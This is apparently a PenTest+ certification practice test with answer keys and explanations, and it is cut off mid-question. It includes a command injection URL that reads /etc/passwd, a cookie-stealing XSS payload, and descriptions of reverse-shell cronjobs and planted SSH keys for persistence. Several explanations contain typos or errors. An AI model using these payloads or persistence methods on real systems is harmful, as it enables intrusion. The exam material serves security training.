CompTIA PenTest+ Certification PT0-001: Practice Test #3 (Total Seminars)

Question 1

Code signing helps prevent against which of the following? (Choose two.)
A.Modification of system file
B.Compromising the signing certificate of the Certificate Authority
C.Successful execution of modified code
D.Execution of malicious software

Answer 1

C.Successful execution of modified code
D.Execution of malicious software

Explanation
Correct Answer: Successful execution of modified code and execution of malicious software are correct. Code that is signed by a vendor such as Microsoft will prevent modified code or malicious code from successfully executing during runtime.

Incorrect Answers: Modification of system files and Compromising the signing certificate of the Certificate Authority are incorrect because code signing enforces integrity, not access controls. Preventing the modification of a system file is a control enforced by the operating system and preventing an attacker from compromising the signing certificate of the Certificate Authority would be handled by an access control.

Question 2

In regard to a pentest report, what is a testing narrative?
A.It shows how successful the pentest team was in conducting the assessment
B.It offers details as to the testing methodology that was executed and the outcome
C.It is require for PCI,HIPPA and FedRAMP pentests
D.It provides details for each tool used to conduct the testing

Answer 2

B.It offers details as to the testing methodology that was executed and the outcome

Explanation
Correct Answer: It offers details as to the testing methodology that was executed and the outcome is correct. The testing narrative provides chronological and causal data regarding the actions taken during testing to provide context for the findings within the scope of the methodology.

Incorrect Answers: It provides details for each tool used to conduct the testing is incorrect because each tool will not be elaborated on, especially if it is irrelevant to describe the technique used to exploit a target.

It shows how successful the pentest team was in conducting the assessment is incorrect because this could be a sign of gloating, and potentially add a negative tone to the report. The pentest team is successful when they execute testing activities that are within the bounds and constraints of the RoE and address all of the customer’s requirements/objectives from the assessment.

It’s required for PCI, HIPAA, and FedRAMP pentests is incorrect because PCI, HIPAA, and FedRAMP pentests have their own standards and guidelines for how a pentest report should be written, and a testing narrative may not be necessary.

Question 3

During a pentest, your team finds a vulnerability in one of the customer’s PHP applications. The following command was used to exploit the vulnerability. What type of vulnerability did your team attempt to exploit?

curl http://www.example.com/info.php?name=test;cat%20/etc/passwd

A.Command injection attack
B.SQL Injection attack
C.Remote file include
D.Local file include

Answer 3

A.Command injection attack

Explanation
Correct Answer: Command injection attack is correct. This scenario shows an example of a command injection attack, where the id web parameter allowed the pentest team to insert the cat command into the URL to read the contents of the local /etc/passwd file.

Incorrect Answers: Remote file include is the incorrect because the attack uses an operating system command to read the local contents of the /etc/passwd file.

Local file include is incorrect because a command was used to read the contents of a local file, not an include function from the PHP application.

SQL injection attack is incorrect because a system command, not an SQL command, was used to carry out the injection attack.

Question 4

The \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_ dictionary is the standard for documenting publicly disclosed vulnerabilities.
A.CWWE
B.CVE
C.NVD
D.BID

Answer 4

B.CVE

Explanation
Correct Answer: CVE is correct. The Common Vulnerabilities and Exposures (CVE) dictionary is the standard for documenting publicly disclosed vulnerabilities.

Incorrect Answers: CWE is incorrect because the Common Weakness Enumeration (CWE) is used to track common vulnerabilities that may not be attributed to a product or service.

NVD is incorrect because the National Vulnerability Database (NVD) is the U.S. government repository of standards-based vulnerability management data and is maintained by the National Institute of Standards and Technology (NIST).

BID is incorrect because the Bugtraq ID (BID) is a reference ID given to a unique vulnerability and is tracked by SecurityFocus (https://www.securityfocus.com), but is not the standard for reporting public vulnerabilities.

Question 5

During a web vulnerability scan, you discover the customer’s web server does not define the X-XSS-Protection header. Given the following scan results from Nikto, how could this type of vulnerability be exploited?
A.The client could be susceptible to a stored CSRF attack that could steal credentials from the users web browser
B.The server could be exploited using a command injection attack
C.The user would be susceptible to clickjacking attacks
D.Since the header is not defined the user could potentially be susceptible to a reflected XSS attack within the web browser

Answer 5

D.Since the header is not defined the user could potentially be susceptible to a reflected XSS attack within the web browser

Explanation
Correct Answer: Since the header is not defined, the user could potentially be susceptible to a reflected XSS attack within the web browser is correct. The X-XSS-Protection response header is used by various web browsers (such as Internet Explorer, Chrome, and Safari) to prevent malicious pages from loading when a reflected cross-site scripting (XSS) attack is detected.

Incorrect Answers: The server could be exploited using a command injection attack is incorrect because this is a client-side attack, not a server-side attack.

The client could be susceptible to a stored CSRF attack that could steal credentials from the user’s web browser is incorrect because the attack vector would be through cross-site scripting (XSS), not cross-site request forgery (CSRF).

The user would be susceptible to clickjacking attacks is incorrect because there is another web server header to help control those types of attacks, such as the X-Frame-Options header.

Question 6

During web application testing you observe an HTTP 403 response from the web server when brute forcing web directories on the server. What is the likely cause of this response?
A.The web server encountered an internal error
B.You attempted to access a web page that requires authentication
C.The web page you requested does not exist
D.The web page was moved to another location

Answer 6

B.You attempted to access a web page that requires authentication

Explanation
Correct Answer: You attempted to access a web page that requires authentication is correct. An HTTP 403 message is attributed to a user not having permission to access a resource on the web server, typically due to the user failing to authenticate prior to requesting the resource.

Incorrect Answers: The web page you requested does not exist is incorrect because an HTTP 404 response is used to produce that type of message.

The web page was moved to another location is incorrect because an HTTP 302 response is used to produce that type of message.

The web server encountered an internal error is incorrect because an HTTP 500 response is used to produce that type of message.

Question 7

Given the following nmap command syntax, what is the purpose of the -T flag?

nmap -n -sSV -T4 192.168.1.0/24

A.An aggressive template used by nmap to enhance the speed of the scan, and is not concerned with accuracy
B.A timing template used by nmap to conserve bandwidth and resource utilization on the target machine
C.A template used by nmap that is followed by a number, <0-5>, to determine how many seconds to execute the scan for (that is 0-5 seconds in total
D.A timing template used by nmap to be sneaky when conducting port scans against a remote target machine

Answer 7

A.An aggressive template used by nmap to enhance the speed of the scan, and is not concerned with accuracy

Explanation
Correct Answer: An aggressive timing template used by nmap to enhance the speed of the scan, and is not concerned with accuracy is correct. The nmap -T flag is a timing template that simplifies the process of telling the port scanner how efficient or effective you want the scan to be. Rather than the tester determine the timing values manually with other performance options, nmap will determine them based on the template used in the scan syntax. -T <0> or <1> is used to be sneaky and evade IDS, while -T <2> is used to conserve bandwidth, -T <3> is the default scan template used when no option is specified, -T <4> is the aggressive scan template, and -T <5> is the insane template. Both <4> and <5> should only be used when network bandwidth is not limited.

Incorrect Answers: The other choices are incorrect. When the -T flag is used, Nmap will determine the timing for you. The number <0-5> passed after the -T flag will determine the template to use, and does not represent the number of seconds to execute the scan for. -T <2> is used to conserve network bandwidth, and the -T <0-1> templates are used to be sneaky and evade IDS.

Question 8

During a pentest, you are able to compromise the local administrator password for one of the Windows servers on the customer's internal domain. Which Sysinternals command can you use to execute a command shell against other Windows servers on the network to see if the customer is susceptible to password reuse?
A.AccessChk
B.BGInfo
C.AccessEnum
D.PsExec

Answer 8

D.PsExec

Explanation
Correct Answer: PsExec is correct. The PsExec utility (psexec.exe) can be used to execute processes (e.g., cmd.exe) on remote hosts over the network using your Windows credentials.

Incorrect Answers: AccessEnum is incorrect because AccessEnum is a Sysinternals tool that enables system administrators a view of the local file system and registry security settings.

BGInfo is incorrect because BGInfo is a Sysinternals tool that allows the wallpaper (background) to be changed for a local user.

AccessChk is incorrect because AccessChk is a Sysinternals tool that can be used to verify user permissions on files, directories, registry keys, global objects, and Windows services.

Question 9

Red teaming can be used to simulate an unauthorized threat actor that has unlimited time, resources, and money. Which of the following threat actors would red teaming be used to simulate, given the scenario?
A.Advanced persistent threat
B.Hacktivist
C.Script kiddie
D,Insider threat

Answer 9

A.Advanced persistent threat

Explanation
Correct Answer: Advanced persistent threat is correct. An advanced persistent threat (APT) has the time and resources available to pursue a target at any cost. A red team assessment, or red teaming, will evaluate how well an organization would fare given a scenario of a real-world attack (cyber threat). Red teaming involves stealth and blended methodologies (such as network penetration testing and social engineering) to simulate an attacker in the category of an APT.

Incorrect Answers: Hactivist is incorrect because a Hactivist will have various levels of expertise.

Script kiddie is incorrect because Script kiddies are less skilled hackers that use public tools, exploits, and techniques.

nsider threat is incorrect because the Insider threat would be an authorized user of the network, not unauthorized.

Question 10

A \_\_\_\_\_\_\_ computes all of the possible hash values for plaintext values of a certain length.
A.Brute force attack
B.Rainbow table
C.Password guessing attack
D.Dictionary attack

Answer 10

B.Rainbow table

Explanation
Correct Answer: Rainbow table is correct. A rainbow table computes all of the possible hash values for plaintext values, up to a certain length. Regardless of your computing power, these tables can become massive and require hefty storage capacity, some over 300GB in size. Each table is usually strategically designed for a specific hash requirement.

Incorrect Answers: Password guessing, Dictionary attack, and brute force attack are incorrect as each of the answers describe a password attack.

Question 11

Prior to the pentest, the customer provides your team with support resources and artifacts in order for your team to assist with the validation testing during an internal assessment. Among these artifacts is the SOAP project file. Which of the following best describes the purpose of this artifact?
A.Provides a machine-readable XML description of HTTP-based web services
B.Fomarily describes the elements comprising an XML document
C.Describes the format for receiving and sending messages
D.Elaborate on the framework used to develop the software application

Answer 11

C.Describes the format for receiving and sending messages

Explanation
Correct Answer: Describes the format for receiving and sending messages is correct. The Simple Object Access Protocol (SOAP) project file describes the format for receiving and sending messages between web-based services.

Incorrect Answers: Provides a machine-readable XML description of HTTP-based web services is incorrect because a machine-readable XML description of HTTP-based web services is found in the Web Services Description Language (WSDL).

Elaborates on the framework used to develop the software application is incorrect because the software development kit (SDK) documentation elaborates on the framework used to develop the software application.

Formally describes the elements comprising an XML document is incorrect because the Extensible Markup Language (XML) scheme definition (XSD) is used to formally describe the elements comprising an XML document.

Question 12

During an internal pentest of a company’s network, you find that a substantial number of Active Directory user account passwords on the Windows domain are susceptible to brute-force login attacks, using passwords of no more than six characters in length, with little to no password complexity. Which mitigation strategy should you recommend to the customer?
A.Limit character reuse
B.Remove default user accounts on the system
C.Enforce a stronger password policy
D.Dont use password susceptible to dictionary attacks

Answer 12

C.Enforce a stronger password policy

Explanation
Correct Answer: Enforce a stronger password policy is correct. The customer’s network in the scenario provided lacks the ability to enforce stronger password settings, which can be controlled using both a technical policy and an administrative control policy. The administrative policy can inform users that they must use passwords that meet a certain level of complexity, and a technical policy can enforce the actions of the administrative policy using a configuration setting.

Incorrect Answers: Don’t use passwords susceptible to dictionary attacks is incorrect because telling the customer to not use passwords susceptible to dictionary attacks only highlights the weakness and is not a mitigation strategy.

Limit character reuse is incorrect because limiting character reuse during the password creation process may not alter the complexity of the password, thus not preventing passwords used on the domain from being susceptible to brute-force logins.

Remove default user accounts on the system is incorrect because removing default user accounts on the system doesn’t address the issue of weak passwords.

Question 13

During a physical pentest, your team was able to duplicate a valid employee's proximity card and would like to use it to gain access to the server room. What type of attack is described in this scenario?
A.Engress sensor bypass
B.RFID cloning
C.Lock bumping
D.SPP

Answer 13

B.RFID cloning

Explanation
Correct Answer: RFID cloning is correct. RFID cloning (badge cloning) is the process of duplicating a valid identification card used for physical entry.

Incorrect Answers: SPP is incorrect because single pin picking (SPP) is a technique used for picking the pins in pin tumbler locks.

Lock bumping is incorrect because lock bumping is a technique used for brute-forcing door locks.

Egress sensor bypass is incorrect because an egress sensor bypass is not used to clone identification cards, but rather accomplished by wedging a piece of paper between the top of the door and the door frame to trigger the motion sensor to release the magnetic lock, allowing unauthorized entry through the door.

Question 14

During a wireless pentest, your team has asked you to recover the four-way handshake for a WPA2 network. Which type of attack will you execute?
A.Wi-Fi jamming
B.Downgrade attack
C.Deuahtneitcation attack
D.Repeating

Answer 14

C.Deuahtneitcation attack

Explanation
Correct Answer: Deauthentication attack is correct. A deauthentication attack will force the wireless client to deauthenticate from the WPA2 wireless network, and when the client reestablishes the connection with the access point, you will be able to capture the handshake.

Incorrect Answers: Wi-Fi jamming is incorrect because Wi-Fi jamming (or RF jamming) is an illegal technique used to block radio frequencies originating from legitimate devices that rely on RF, such as equipment found in hospitals.

Downgrade attack is incorrect because downgrade attacks are used to target weak encryption protocols or ciphers for man-in-the-middle attacks.

Repeating is incorrect because repeating is used to extend a wireless network for clients outside the range of a wireless access point.

Question 15

During a physical pentest, you find that your customer is using a cipher lock to secure access to their server room. Which of the following are attacks that you can perform to bypass the locking mechanism using a forensically sound approach? (Choose two.)
A.Shim
B.Brute-force the cipher
C.HAmmer
D.High-powered magnet

Answer 15

B.Brute-force the cipher
D.High-powered magnet

Explanation
Correct Answers: High-powered magnet is correct because placing a high-powered magnet on the exterior housing of the cipher lock will draw the internal flag out of position so the lock can be opened.

Brute-force the cipher is correct because the lock is susceptible to brute-force methods, but depending on the combination it could take a considerable amount of time to execute successfully.

Incorrect Answers: Shim is incorrect because the exterior housing of the cipher lock is closed off, preventing the shim from being an effective method of attack.

Hammer is incorrect because a hammer is destructive and is not a forensically sound method for opening the lock.

Question 16

In the context of a pentest report, a finding is a weakness that could be advantageous to an attacker and, when documented in the report, includes actionable items from exploitation and post-exploitation activities. Which of the following would be considered findings that should be included in the pentest report? (Choose two.)
A.The pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organizations telecommunications closet
B.The vulnerability scanner found that the version of SSL being used does not meet industry best practices. However, this vulnerability was not found when the scan was executed from inside the trusted network
C.The pentest team conducted MTM exploitation against assets operating on the LAN
D.A SQL Injection vulnerability provided the pentest team direct access to the production database server

Answer 16

A.The pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organizations telecommunications closet
D.A SQL Injection vulnerability provided the pentest team direct access to the production database server

Explanation
Correct Answers: A SQL injection vulnerability provided the pentest team direct access to the production database server and the pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organization’s telecommunications close are correct. They describe the exploitation of a vulnerability and provide supporting written evidence of a finding.

Incorrect Answers: The pentest team conducted MiTM exploitation against assets operating on the LAN is incorrect because conducting man-in-the-middle (MiTM) testing does not constitute a finding; rather, it’s a testing activity or methodology that can be added to the testing narrative to describe internal testing on the local area network (LAN). However, there are valid mitigations that environments can put in place to reduce or remove the ability for an attacker to successfully perform MiTM attacks. The vulnerability scanner found that the version of SSL being used does not meet industry best practices. However, this vulnerability was not found when the scan was executed from inside the trusted network is incorrect because a vulnerability produced from a vulnerability scanner is not always valid. Sometimes the results are false positives that require further investigation.

Question 17

Requirements management is a continuous process that enables personnel to manage the needs of an organization. A key aspect of requirements management is the \_\_\_\_\_\_\_\_\_\_\_\_\_, which is a formal approach to assessing the pros and cons of pursuing a course of action.
A.Organizational budget
B.Impact statement
C.Impact analysis
D.technical constraints

Answer 17

C.Impact analysis

Explanation
Correct Answer: Impact analysis is correct. The impact analysis (IA) is a key aspect of requirements management and the formal approach to assessing the pros and cons of pursuing a course of action.

Incorrect Answers: Impact statement is incorrect because the impact statement is an output from the impact analysis process, so the analysis/research needs to be conducted prior to deriving any results.

Organizational budget is incorrect because the organizational budget is used to determine if funds are available to support a particular activity, such as a pentest.

Technical constraints is incorrect because technical constraints identify technological challenges and obstacles that could negatively affect the organization.

Question 18

Organizations looking for an evaluation that tests their defense posture against real-world attacks that involve stealth and blended methodologies and that tests time to detection, time to response, and resilience against specific modeled threats would be looking for which type of assessment?
A.Goals-based
B.PCI-DSS
C.Red team
D.Compliance-based

Answer 18

C.Red team

Explanation
Correct Answer: Red team is correct. A red team assessment, or red teaming, will evaluate how well an organization would fare given a scenario of a real-world attack of skilled attackers. Red teaming involves stealth and blended methodologies (such as social engineering and network penetration testing). The goals of red teaming are to test time to detection, time to response, and resilience against specifically modeled threats using tactics not limited to a single attack scope.

Incorrect Answer:Compliance-based and PICI DSS incorrect because those types of assessments would satisfy compliance and regulatory based assessments.

Goals-based is incorrect because goals-based assessments cover specific goals, or objectives, within a defined scope, whereas red teaming could expand using tactics that are not limited to a single attack scope.

Question 19

After gaining a foothold in customer ABC’s network, you want to set up persistence on the target Linux host you compromised root-level access on. The host is configured to allow SSH logins as root, and the root account is configured to support VNC and SSH connectivity from anywhere. Which of the following options are an alternative to creating a cronjob that sends a reverse shell to your attack box occasionally? (Choose two.)
A.Generate an SSH key and append a self-generated public key to root’s authorized_user file
B.Create a new user account with sudo privilege’s
C.Change the VNC password
D.All of the answer choices are correct

Answer 19

A.Generate an SSH key and append a self-generated public key to root’s authorized_user file
B.Create a new user account with sudo privilege’s

Explanation
Correct Answer: Create a new user account with sudo privileges is correct because creating a new user account will not interfere with existing accounts on the network, and allowing sudo access will ensure you can still obtain root-level access to the target host.

Generate an SSH key and append a self-generated public key to root’s authorized_user file is correct because root SSH logins are permitted and you are using a self-generated key (that no one else should have but you) to access the root user account, which can be removed after testing is completed.

Incorrect Answer:Change the VNC password is incorrect because changing the VNC password would prevent the authorized user from logging in, which could prevent the user from doing legitimate work and impact the productivity for the organization.

“All of the answers are correct” is incorrect because change the VNC password is incorrect.

Question 20

The rules of engagement (RoE) document MUST contain a signature from which of the following? (Choose two.)
A.Contracts department
B.Finance department
C.Organizational management
D.Service vendor

Answer 20

C.Organizational management
D.Service vendor

Explanation
Correct Answers: Service vendor is correct because the service vendor is the one who carries out the execution of the pentest.

Organizational management is correct because organizational management is responsible for working with the vendor to ensure they have what they need to be successful, and providing direct oversight of the project.

Incorrect Answers: Finance department is incorrect because the financial department is responsible for paying the purchase order for the work and verifying the service vendor’s invoice.

Contracts department is incorrect because the contracts department is involved when signing other contractual documents such as the MSA or SOW, and holds the service vendor accountable for all contractual obligations. Neither department needs to sign the RoE document.

Question 21

In a SCADA system, Modbus typically operates on which of the following ports?
A.502/tcp
B.3306/tcp
C.902/tcp
D.161/udp

Answer 21

A.502/tcp

Explanation
Correct Answer: 502/tcp is correct.

Incorrect Answers: Modbus is a common Supervisory Control and Data Acquisition (SCADA) protocol that operates on port 502/tcp.

161/udp is incorrect because port 161/udp is used for SNMP. 902/udp is incorrect because port 902/tcp is used for VMware Server.

3306/tcp is incorrect because port 3306/tcp is used for MySQL Server.

Question 22

Open-source intelligence (OSINT) gathering is the process of data mining public sources of information about your target or target environment. Which of the following is a valid source for conducting OSINT?
A.Websites
B.All of the answer choices are correct
C.Social media
D.Public records

Answer 22

B.All of the answer choices are correct

Explanation
Correct Answers: All of the answers are correct. All of the choices can provide open-source intelligence and knowledge from public sources of information regarding your target’s environment.

Incorrect Answer: All of the other choices are incorrect as individual responses because they all are valid sources for conducting OSINT, making choice “all the answers” the best answer.

Question 23

IEEE 802.3 is the standard for which of the following options?
A.Bluetooth
B.Wired Ethernet
C.Wi-Fi
D.Zigbee

Answer 23

B.Wired Ethernet

Explanation
Correct Answer: Wired Ethernet is correct. The IEEE 802.3 standard describes all the physical characteristics of wired Ethernet, including the physical layer, data link layer, and media access control (MAC) that are used to communicate over local area networks (LANs) and wide area networks (WANs).

Incorrect Answers: Wi-FI is incorrect because Wi-Fi standards are defined in IEEE 802.11.

Bluetooth and Zigbee are incorrect because Bluetooth and Zigbee are defined in IEEE 802.15.

Question 24

During a pentest, you were able to compromise the local `/etc/shadow` file for a Linux server. Given limited time and resources, you won't be able to use advanced methods to crack the passwords. Given these constraints, which of the following will allow you to apply a best effort to crack the password hashes? (Choose three.)
A.Password guessing
B.Dictionary attack
C.Brute force
D.Rainbow table

Answer 24

A.Password guessing
B.Dictionary attack
C.Brute force

Explanation
Correct Answers: Brute force, dictionary attack, and password guessing are correct. These answers are brute-force/guessing attacks that can be used to recover the plaintext value of a hash that has little to no password complexity, or is subject to a dictionary attack using a word list.

Incorrect Answer: Rainbow table is incorrect. It will take some time to compute a hash table, given the current constraints in the scenario.

Question 25

Disassembling and decompiling an application from its original format to look for security bugs is considered which of the following activities?
A.Debugging
B.Dynamic application security testing (DAST)
C.Source code analysis
D.Static application security testing (SAST)

Answer 25

D.Static application security testing (SAST)

Explanation
Correct Answer: Static application security testing (SAST) is correct. SAST is a debugging method used to examine source code, bytecode, and binaries for security deficiencies and does not involve executing the application.

Incorrect Answers: Dynamic application security testing (DAST) is incorrect because DAST is used when the application is running.

Debugging is incorrect because debugging is not necessarily used just for finding security bugs as it can be used by the developer for troubleshooting purposes.

Source code analysis is incorrect because source code analysis is not a process that decompiles or disassemble an application. Source code is typically the noncompiled functionality of a program.

Question 26

After obtaining root access through a local privilege escalation vulnerability on a Linux server, you decide to create a cronjob to call back to your attack host with a remote shell every hour in case the system administrator reboots the server. This technique is known as what? (Choose two.)
A.Creating a back door
B.Lateral movement
C.Pivoting
D. Maintaining persistence

Answer 26

A.Creating a back door
D. Maintaining persistence

Explanation
Correct Answer: Maintaining persistence and Creating a back door are correct. Creating a cronjob to call back to your attack host would be considered both maintaining persistence and creating a backdoor into the customer’s network.

Incorrect Answer: Lateral movement is incorrect because lateral movement would be remotely connecting to other hosts on the customer’s network or domain using native operating system commands, such as ssh with the same user’s domain credentials.

Pivoting is incorrect because pivoting would be the process of utilizing a compromised target or host within your control to exploit trust relationships within the domain. For example, establishing a foothold on a compromised target in the customer network behind an external firewall, then creating an SSH tunnel through the firewall to stage attacks against other internal network targets from the compromised target.

Question 27

Directory indexing attacks can exploit which feature of a web server?
A.Weak access controls
B.Listing files and other objects within the current directory
C.Authentication bypass

Answer 27

B.Listing files and other objects within the current directory
Explanation
Correct Answer: Listing files and other objects within the current directory is correct. Directory indexing (directory browsing) is similar to an ls command in Unix or dir command in Windows. With directory browsing enabled on the web server and a lack of access controls, an attacker would not have to rely on brute-force methods to derive web pages and/or subdirectories as they would be exposed from the within the current directory.

Incorrect Answer: Authentication bypass is incorrect because authentication bypass is a different type of attack, and would only be possible if the web server or application hosted on the server was vulnerable to that type of attack.

Weak access controls is incorrect because simply being able to list the contents of a web directory remotely does not mean the server has weak access controls. The listing of files and objects within the current directory can save a pentester time with having to brute-force all of those objects; however, in some cases, the customer may have allowed directory indexing for a reason.

Question 28

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_ is a tactical process for surveying an area for wireless access points while in a moving vehicle.
A.Stumbling
B.Wardriving
C.Enumeration
D.Scanning

Answer 28

B.Wardriving

Explanation
Correct Answer: Wardriving is correct. Wardriving is a tactical process for surveying an area for wireless access points while in a moving vehicle in order to identify wireless networks and potential targets in a certain area of interest.

Incorrect Answers: Stumbling is incorrect because stumbling is a surveillance technique used for discovering SSIDs, router vendor information and signal strength, MAC addresses, channels, and so on.

Scanning is incorrect because scanning is the process of examining or studying the surface of an object. In regard to scanning a network, this option is a little more obtrusive than wardriving.

Enumeration is incorrect because enumeration is the process of extracting information from a particular target, rather than passive surveillance of a target area during reconnaissance

Question 29

Given the following example, which of these statements is correct?
A.Netcat is listening for a reverse shell from the kali host
B.Netcat was used to connect to a bind shell on dns1
C.Netcat was executed from the kali host to connect to dns1
D.Netcat was used to connect back to the kali host using a reverse shell

Answer 29

D.Netcat was used to connect back to the kali host using a reverse shell

Explanation
Correct Answer: Netcat was used to connect back to the kali host using a reverse shell is correct.

Incorrect Answers: The netcat command was used to establish a reverse shell with the kali host.

Netcat was executed from the kali host to connect to dns1 is incorrect because the reverse shell was executed from the target host (dns1), not the kali host.

Netcat is listening for a reverse shell from the kali host is incorrect because the target host (dns1) was used to establish a reverse shell with the kali host.

Netcat was used to connect to a bind shell on dns1 is incorrect because the target host (dns1) used a reverse shell, not a bind shell, to call back to the kali host.

Question 30

PCI DSS, HIPAA, and FISMA assessments are considered what type of testing?
A.Red team
B.Objective-based
C.Goals-based 
D.Compliance-based

Answer 30

D.Compliance-based

Explanation
Correct Answer: Compliance-based is correct. A compliance-based assessment audits an organization’s ability to follow and implement a given set of security standards within an environment. Many industry standards affect and regulate the way sensitive data may be protected, stored, and processed within an information system. The Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA), and Federal Information Security Management Act (FISMA) are compliance-based standards that mandate that all organizations to which they apply maintain a secure environment.

Incorrect Answers:Goals-based and objectives-based are incorrect because these interchangeable terms refer to an assessment that attempts to evaluate the security within an organization through a simulated cyber-attack; it is not associated with compliance-based testing.

Red team is incorrect because a red team assessment, or red teaming, evaluates how well an organization would fare given a scenario of a real-world attack and is not associated with compliance-based testing.

Question 31

During a pentest, you find port 161/udp (SNMP) open on one of your target hosts that supports all three versions of the protocol. Which versions support a community string that is sent in cleartext between the manager and the agent? (Choose two.)
A.SNMPv1
B.SNMPv2
C.SNMPv3
D.None of the answer choices are correct

Answer 31

A.SNMPv1
B.SNMPv2

Explanation
Correct Answers: SNMPv1 and SNMPv2 are correct. In network environments that support legacy services, you are likely to find all three versions of SNMP. Authentication in SNMPv1 and v2 is nothing more than a community string (i.e. password), which is sent in cleartext between the manager and the agent.

Incorrect Answers: SMPMv3 and “None of the answers are correct” are incorrect. SNMPv3 community strings (passwords) are not forwarded in cleartext. Best practices suggest the use of SNMPv3 with strong passwords and the authentication protocol set to SHA.

Question 32

During a web pentest, your team discovers that they can inject arbitrary code in an HTTP GET request using one of the URL parameters passed back to the target web server. Looking at the following example request they executed, what type of attack did they perform?www.example.com/info.php?id=alert(document.cookie)
A.Stored XSS
B.SQLi
C.DOM-based XSS
D.Reflected XSS

Answer 32

D.Reflected XSS

Explanation
Correct Answer: Reflected XSS is correct. The example request shows a reflected XSS (cross-site scripting) where the attacker can inject code within a single HTTP response that gets processed by the web server/application and sent back to the browser without being filtered.

Incorrect Answers: DOM-based XSS is incorrect because a Document Object Model (DOM)-based XSS attack is passed down to the web browser from the application during runtime, and is used for structuring content. Unlike the reflected XSS attack, execution happens directly in the user’s browser, since not every object is treated as a query by the browser.

Stored XSS is incorrect because stored XSS happens when code can be stored server-side, such as in a log file and exploited against any web browser that accesses the code from the server. This type of attack can be used to steal and redirect a session token from an authorized user in the application.

SQLi is incorrect because SQLi is a SQL injection attack, which relies on SQL commands, not Java script tags.

Question 33

Mitigation strategies could be provided for which of the following categories?
A.Processes
B.Technology
C.All of the answer choices are correct
D.People

Answer 33

C.All of the answer choices are correct

Explanation
Correct Answers: All of the answers are correct. People, technology, and processes could be the cause of a vulnerability within the organization or on the organization’s network. However, these elements can also carry, identify, or implement the solution to help remediate the problem.

Incorrect Answers: The other answers are incorrect by themselves, as all of the choices are correct.

Question 34

Out of the following cryptographic protocols, which one offers the BEST security when posting sensitive data to a web server over the Internet?
A.TLSv1.2
B.SSLv3
C.TLSv1.0
D.SSLv2

Answer 34

A.TLSv1.2

Explanation
Correct Answer: TLSv1.2 is correct. Transport Layer Security (TLS) version 1.2 is the latest version of the protocol and supersedes the other protocols listed.

Incorrect Answers: TLSv1.0 is incorrect because TLSv1.0 is susceptible to downgrade attacks and could leave the client susceptible to man-in-the-middle (MiTM) attacks.

SSLv3 and SSLv2 are incorrect because the Secure Sockets Layer (SSL) version are also vulnerable to MiTM attacks and are superseded by TLSv1.2.

Question 35

ARP poisoning can assist with accomplishing which of the following tasks on a local area network (LAN)? (Choose two.)
A.DNS cache poisoning
B.Redirecting a target to a malicious website
C.Impersonating another host on the network
D.Waterholing

Answer 35

B.Redirecting a target to a malicious website
C.Impersonating another host on the network

Explanation
Correct Answer: Redirecting a target to a malicious website and Impersonating another host on the network are correct. If you want to redirect someone to a malicious website, you only need ARP (Address Resolution Protocol) poisoning to impersonate a host on the LAN and change (man-in-the-middle) whatever you like about the traffic in transit, such as the MAC address of the network interface for the host you would like to impersonate. The host impersonation occurs when the attacker sends fake replies to ARP requests from legitimate hosts in order to capture or redirect traffic on the LAN. These tasks can be accomplished using a tool such as Ettercap.

Incorrect Answers: Waterholing is incorrect because waterholing is a social engineering method used to target a specific group with malware on a website that is frequented by the targets.

DNS cache poisoning is incorrect because DNS cache poisoning is when an attacker overwrites the DNS resolver cache with a malicious web address on a DNS server, which could be external to the LAN. DNS cache poisoning may be a viable attack option in a case where local network access to perform ARP spoofing is unavailable.

Question 36

During a wireless survey of a customer’s network, you discover multiple BSSIDs. In regard to wireless communications, what is the purpose of the BSSID?
A.Describes the MAC address of the wireless client
B.Describes the unique MAC address of the access point
C.Describes the name of the distributed system (DS)
D.Describes the name of the WLAN

Answer 36

B.Describes the unqiue MAC address of the access point

Explanation
Correct Answer: Describes the unique MAC address of the access point is correct. The Basic Service Set Identifier (BSSID) is used to describe the unique MAC address of the access point. This provides network clarity when multiple access points are on the same wireless local area network (WLAN) broadcasting the same SSID.

Incorrect Answers: Describes the name of the WLAN is incorrect because the Service Set Identifier (SSID) is the name given to the wireless network.

Describes the name of the distribution system (DS) is incorrect because the distribution system (DS) is used to connect multiple access points on the network.

Describes the MAC address of the wireless client is incorrect because the MAC describes the wireless client (or station) on the network.

Question 37

Given the following nmap output, which format was this file saved in?
A.ASCII output
B.CSV output
B.Grepable output
D.XML output

Answer 37

B.Grepable output

Explanation
Correct Answer: Grepable output is correct. The nmap scan file was saved in the grepable output. The grepable nmap format lists each host on a separate line and can be searched and parsed with standard tools like grep, awk, cut, sed, diff, and Perl. The format is most distinguished by the “,” and “/” character delineators used to separate data fields in the file.

Incorrect Answers: XML output is incorrect because the nmap file format would need to be in Extensible Markup Language (XML), which is formatted like an HTML file.

ASCII output is incorrect because the file would be human readable text, without the need for special characters to separate data elements so they can be parsed.

CSV output is incorrect because nmap does not support CSV (comma delineated) formatted output.

Question 38

During the internal portion of a pentest, you notice an executable called newcmd.exe in the C:/Windows/Temp folder of one of your targets. The executable is also in the process listing, running with SYSTEM privileges and consuming a great deal of hardware resources on the host. You consult with your team, and no one else has touched this target. What is the best course of actions for this scenario?
A.Remove the executable and inform the customer
B.Conduct malware analysis against the executable
C.Inform the customer immediately of the potential compromise
D.Include the incident in the pentest report, but dont bother the customer at this time

Answer 38

C.Inform the customer immediately of the potential compromise

Explanation
Correct Answer: Inform the customer immediately of the potential compromise is correct. Given a scenario that may require deconfliction, your pentest team may need to sort out the pentest artifacts from the artifacts of a real compromise.

Incorrect Answers: Include the incident in the pentest report, but don’t bother the customer at this time is incorrect because you want to make sure you are doing your due diligence for the customer by letting them know of potential suspicious activity that was not from you. As a pentester, your role is to emulate the enemy; however, honesty and integrity are two very important character traits that your customer’s will both respect and appreciate.

Conduct malware analysis against the executable is incorrect because the customer will want to conduct their own investigation and, if necessary, their own incident response.

Remove the executable and inform the customer is incorrect because removing the executable from the host could be bad, especially if it was a legitimate program. You always want to respect the rights of the customer and maintain communication on any potential issues that may arise during the pentest.

Question 39

Hiding or obfuscating the IDOR parameter in a web response from the server will help do which of the following?
A.PRevent the parameter from being injectable
B.Provide access controls for the web application
C.Stop an attacker from exfiltrating sensitive data from an application or database
